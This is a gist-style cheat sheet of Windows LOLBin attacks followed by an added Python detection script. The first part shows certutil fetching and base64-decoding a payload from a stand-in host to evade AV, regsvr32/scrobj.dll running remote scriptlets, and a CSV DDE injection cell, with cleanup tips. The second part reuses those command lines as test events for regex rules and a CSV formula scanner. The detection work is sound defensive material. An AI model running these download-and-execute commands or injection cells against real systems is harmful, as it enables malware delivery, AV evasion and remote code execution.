Gist: HadesNull123/47219a42ce7c15bbdfef56209c76bd8a
# certutil.exe: bypass AV on download by fetching the payload as base64 text, then decoding it locally
# First base64-encode the malicious file so that, to an edge device inspecting the download, it looks like harmless text.
# Once the text file is on the host, "certutil.exe -decode" turns the base64 back into the executable.
# Any base64 encoder will do, e.g. https://www.browserling.com/tools/file-to-base64 (or "certutil -encode bad.exe bad.txt" on
# another Windows box, which wraps the base64 in -----BEGIN/END CERTIFICATE----- lines; -decode accepts both that form and bare base64).
# Illustrated in Xavier Mertens' handler diary and in:
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# Caveats: this only defeats inspection of the download in transit; bad.exe is an ordinary file once written and is scanned
# like any other. -urlcache also leaves MetaData/Content entries in the user's CryptnetUrlCache (under the LocalLow profile
# directory), which forensics can recover; "certutil -urlcache * delete" is the usual cleanup and is itself a detection signal.
# certutil.exe bypass AV on download + scriptlet execution through regsvr32.exe ("Squiblydoo")
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
# Fetch a COM scriptlet (.sct content; the file extension does not matter) with certutil, then have the signed regsvr32.exe
# hand it to scrobj.dll. /s = silent, /u = call the uninstall path (nothing stays registered), /i: = argument passed to
# scrobj.dll's DllInstall, which loads and runs the scriptlet. This is proxy execution via a trusted binary, not DLL injection.
certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /i:file.blah scrobj.dll
# CSV injection: a DDE cell that launches regsvr32 with a remote scriptlet
# https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/
# The cell starts with "=" so Excel evaluates it; "=MSEXCEL|'command'!''" is a DDE link that makes Excel run the quoted
# command. The \..\..\.. prefix walks up from Excel's own directory to the drive root before descending into System32.
# Excel warns the user before updating a DDE link, so this needs a click-through. As one cell in a larger row:
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
# As the only cell:
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
# The command that ends up running (/n = do not call DllRegisterServer, only the /i: DllInstall path):
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
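As an added example covering all three sections above (not part of the gist), here is the detection side: command-line rules for the certutil download/decode and regsvr32+scrobj.dll patterns, run over a few constructed Sysmon-style process-creation records, plus a CSV scanner that flags cells a spreadsheet would evaluate and the exporter-side apostrophe fix. The event records and the CSV are constructed from the command lines on this page (plus one benign certutil call for contrast); nothing was captured from a real host, and the rule names are my own.

```python
# Added example, not from the original gist: detection logic for the three
# LOLBin patterns on this page, run over constructed process-creation records
# and a constructed CSV. Nothing here was captured from a real host.
import csv
import io
import re
from typing import Dict, List, Tuple

# Sysmon Event ID 1 shape (Image, CommandLine). Constructed from the command
# lines on this page plus one benign certutil invocation for contrast.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -decode bad.txt bad.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify user.cer"},  # benign, should not fire
]

# certutil and regsvr32 accept both "-" and "/" for switches, so match either.
CMDLINE_RULES = {
    "certutil_urlcache_download": re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*[-/]f\b", re.I),
    "certutil_base64_decode":     re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]decode\b", re.I),
    "regsvr32_scriptlet_scrobj":  re.compile(r"\bregsvr32(?:\.exe)?\b.*[-/]i:\S+.*\bscrobj\.dll\b", re.I),
}


def match_cmdline(cmdline: str) -> List[str]:
    """Names of every rule that fires on one command line."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(CommandLine, matched rules) for every event that trips at least one rule."""
    hits = []
    for ev in events:
        names = match_cmdline(ev["CommandLine"])
        if names:
            hits.append((ev["CommandLine"], names))
    return hits


# --- CSV side: spot cells a spreadsheet would evaluate ----------------------

# Constructed CSV with the page's DDE payload as the last cell of the last row.
CSV_SAMPLE = (
    "name,dept,id,note\n"
    "alice,eng,1,nothing to see\n"
    r"fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''"
    "\n"
)

# Leading characters that make Excel/LibreOffice treat a cell as a formula.
# "+" and "-" are included deliberately (conservative: negative numbers get flagged too).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
DDE_CELL = re.compile(r"^\s*[=+\-@][A-Za-z0-9_.]*\|")  # =APP|'topic'!item shape


def is_formula_cell(cell: str) -> bool:
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def is_dde_cell(cell: str) -> bool:
    return DDE_CELL.match(cell) is not None


def find_dangerous_cells(csv_text: str) -> List[Tuple[int, int, str]]:
    """(row, column, 'dde' or 'formula') for each cell a spreadsheet would evaluate."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text, newline=""))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c, "dde" if is_dde_cell(cell) else "formula"))
    return hits


def neutralize_cell(cell: str) -> str:
    """Exporter-side fix: a leading apostrophe makes Excel keep the cell as literal text."""
    return "'" + cell if is_formula_cell(cell) else cell


if __name__ == "__main__":
    for cmdline, names in scan_events(EVENTS):
        print(f"{names}: {cmdline}")
    for r, c, kind in find_dangerous_cells(CSV_SAMPLE):
        print(f"row {r} col {c}: {kind}")
```

The command-line rules key on the switch combination rather than on the binary alone, since certutil and regsvr32 are used legitimately all day; the regsvr32 rule requires both /i: and scrobj.dll, which together have no normal administrative use. On the CSV side the scan is what a file-upload or export gateway should run, and neutralize_cell is the fix on the producing side, where user-controlled strings should never reach a cell unprefixed.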